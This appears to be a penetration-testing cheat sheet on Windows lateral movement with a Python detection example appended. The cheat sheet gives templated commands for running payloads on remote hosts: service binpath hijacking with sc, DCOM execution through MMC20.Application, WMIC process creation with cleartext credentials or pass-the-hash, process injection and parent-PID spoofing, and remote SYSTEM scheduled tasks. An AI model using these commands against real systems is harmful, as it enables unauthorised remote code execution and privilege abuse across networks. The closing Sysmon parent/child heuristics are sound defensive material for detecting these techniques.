Lateral Movement
Service Manipulation
(VSS is a commonly used service)
sc \\<REMOTE_IP> query <SERVICENAME>
sc \\<REMOTE_IP> qc <SERVICENAME>
sc \\<REMOTE_IP> qfailure <SERVICENAME>
sc \\<REMOTE_IP> config <SERVICENAME> binpath= "<PAYLOAD LOC>"
sc \\<REMOTE_IP> start <SERVICENAME>
sc \\<REMOTE_IP> config <SERVICENAME> binpath= "<ORIGINAL FILE LOC>"
sc \\<REMOTE_IP> qc <SERVICENAME>
COM Object
([activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","<IPToTarget>"))).Document.ActiveView.ExecuteShellCommand("<CommandToExec>",$null,$null,"7")
WMIC
WMIC /NODE:"<IP OR HOSTNAME>" /USER:"<DOMAIN\USERNAME>" /PASSWORD:"<CLEARTEXT_PW>" PROCESS CALL CREATE "<PAYLOAD_FILE_LOC>"
(or, with pass-the-hash (PTH), without explicit credentials)
WMIC /NODE:"<IP OR HOSTNAME>" PROCESS CALL CREATE "<PAYLOAD_FILE_LOC>"
(The following should be run after migrating into the process created via WMIC)
getprivs
ppid <random SYSTEM process PID>
execute c:\windows\system32\upnpcont.exe
inject <new process ID> x64
SCHTASKS
(If privileged, the /RU and /SC ONLOGON options are available)
schtasks.exe /Create /S <IP or HOSTNAME> /F /RU SYSTEM /SC ONLOGON /TN "<TASKNAME>" /TR "<PAYLOAD_FILEPATH>"
schtasks.exe /run /s <IP or HOSTNAME> /TN <TASKNAME>
schtasks.exe /DELETE /F /TN "<TASKNAME>"
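Each of the four techniques above leaves a characteristic parent/child process relationship on the target host. The following added example (not part of the original cheat sheet) runs those detection heuristics over constructed Sysmon Event ID 1 records; the field names follow Sysmon's schema, while the sample records, the expected-directory list and the rule names are assumptions made for this example.

```python
import re

# Paths from which services.exe is expected to start binaries (assumption).
EXPECTED_SERVICE_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                         "c:\\program files")

# Parent process (and, where needed, parent command line) that executes on
# behalf of a remote caller for each technique on this page.
RULES = [
    ("service-manipulation", r"\\services\.exe$", None),
    ("wmi-process-create",   r"\\wmiprvse\.exe$", None),
    ("dcom-mmc20",           r"\\mmc\.exe$",      r"-embedding"),
    ("scheduled-task",       r"\\svchost\.exe$",  r"-s schedule\b"),
]


def classify(ev):
    """Return the technique label a process-creation event matches, or None."""
    parent = ev.get("ParentImage", "").lower()
    pcmd = ev.get("ParentCommandLine", "").lower()
    image = ev.get("Image", "").lower()
    for label, parent_re, cmd_re in RULES:
        if not re.search(parent_re, parent):
            continue
        if cmd_re and not re.search(cmd_re, pcmd):
            continue
        # services.exe legitimately launches many binaries; only flag a
        # service image that lives outside the expected directories.
        if label == "service-manipulation" and image.startswith(EXPECTED_SERVICE_DIRS):
            continue
        return label
    return None


def scan(events):
    """Return (label, image) for every event that matches a rule."""
    hits = [(classify(e), e["Image"]) for e in events]
    return [(label, image) for label, image in hits if label]


SAMPLE_EVENTS = [  # constructed records, not real telemetry
    {"Image": r"C:\Windows\Temp\update.exe", "ParentImage": r"C:\Windows\System32\services.exe",
     "ParentCommandLine": r"C:\Windows\system32\services.exe"},
    {"Image": r"C:\Windows\System32\svchost.exe", "ParentImage": r"C:\Windows\System32\services.exe",
     "ParentCommandLine": r"C:\Windows\system32\services.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "ParentCommandLine": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\mmc.exe",
     "ParentCommandLine": r'"C:\Windows\system32\mmc.exe" -Embedding'},
    {"Image": r"C:\Users\Public\task.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "ParentCommandLine": r"C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule"},
]
```

The second sample (svchost.exe started by services.exe) is deliberately benign and must not be flagged; correlating hits with Security event 4624 logon type 3 from the same source narrows the results to remotely initiated activity.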